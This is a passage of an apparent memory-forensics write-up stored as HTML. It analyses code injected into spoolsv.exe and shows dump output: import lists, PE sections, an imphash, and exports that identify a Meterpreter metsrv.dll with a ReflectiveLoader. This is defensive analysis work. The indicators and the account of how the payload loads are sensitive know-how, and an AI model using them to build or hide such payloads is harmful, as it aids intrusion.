style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.HeapAlloc</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.HeapReAlloc</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetSystemTimeAsFileTime</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.RtlUnwindEx</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetCommandLineA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.EnterCriticalSection</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.LeaveCriticalSection</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetTimeZoneInformation</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.IsProcessorFeaturePresent</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.IsDebuggerPresent</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetModuleFileNameW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetModuleHandleExW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.WriteConsoleW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.EncodePointer</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.DecodePointer</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SetConsoleCtrlHandler</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetConsoleMode</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.ReadConsoleInputA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.SetConsoleMode</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.GetProcessHeap</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- KERNEL32.dll.AreFileApisANSI</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- USER32.dll.GetThreadDesktop</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- USER32.dll.GetUserObjectInformationW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- USER32.dll.MessageBoxW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- USER32.dll.GetDesktopWindow</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- USER32.dll.GetProcessWindowStation</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- ADVAPI32.dll.ReportEventW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- ADVAPI32.dll.AdjustTokenPrivileges</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- ADVAPI32.dll.ImpersonateLoggedOnUser</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- ADVAPI32.dll.LookupPrivilegeValueA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- ADVAPI32.dll.RegisterEventSourceW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- ADVAPI32.dll.DeregisterEventSource</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- ADVAPI32.dll.OpenThreadToken</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- ADVAPI32.dll.OpenProcessToken</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">sections:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- .text</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>virtual address: 0x1000 <span class="Apple-converted-space"> </span>size: 0xb3ac4</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>raw address: <span class="Apple-converted-space"> </span>0x400<span class="Apple-converted-space"> </span>size: 0xb3c00</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- .rdata</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>virtual address: 0xb5000<span class="Apple-converted-space"> </span>size: 0x4019e</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>raw address: <span class="Apple-converted-space"> </span>0xb4000<span class="Apple-converted-space"> </span>size: 0x40200</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- .data</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>virtual address: 0xf6000<span class="Apple-converted-space"> </span>size: 0x25ad0</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>raw address: <span class="Apple-converted-space"> </span>0xf4200<span class="Apple-converted-space"> </span>size: 0x1e600</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- .pdata</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>virtual address: 0x11c000 <span class="Apple-converted-space"> </span>size: 0xa02c</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>raw address: <span class="Apple-converted-space"> </span>0x112800 <span class="Apple-converted-space"> </span>size: 0xa200</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>- .reloc</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>virtual address: 0x127000 <span class="Apple-converted-space"> </span>size: 0x571c</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>raw address: <span class="Apple-converted-space"> </span>0x11ca00 <span class="Apple-converted-space"> </span>size: 0x5800</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">imphash: 5df789b340bdc9056bbdeb6485e684b1</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Beautiful! We've got the name of the dll, </font><a href="https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/" target="_blank"><font face="courier">metsrv.dll</font></a><font face="inherit">, its exports and imports. If we extract the dlls from the imports, we get:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">ADVAPI32.dll</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CRYPT32.dll</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span style="font-variant-ligatures: no-common-ligatures;">KERNEL32.dll</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">USER32.dll</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">WINHTTP.dll</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">WININET.dll</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">WS2_32.dll</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Of these, </font><font face="courier">WINHTTP.dll</font><font face="inherit"> and </font><font face="courier">WININET.dll</font><font face="inherit"> are both in the list of late loaded dlls into </font><font face="courier">spoolsv.exe</font><font face="inherit">.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">What of the others? Let's check the other dumps.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">davehull@scrutiny:~/res/malfind_dump$ memdumppe.py process.0xfffffa8005138980.0xf093d40000.dmp 0</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">imestamp: 2017-03-17T17:57:34+00:00</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">checksum: 0x12beb5</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#f4f4f4">export name: </font><font color="#04ff00">metsrv.dll</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">exports:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>0) Init</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space" style="color: #f4f4f4;"> </span><font color="#f4f4f4">1) </font><font color="#04ff00">ReflectiveLoader</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">...</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">imphash: 5df789b340bdc9056bbdeb6485e684b1</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">This dump matches the other and gives us no new information. Next:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">davehull@scrutiny:~/res/malfind_dump$ memdumppe.py process.0xfffffa8005138980.0xf093650000.dmp 0</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 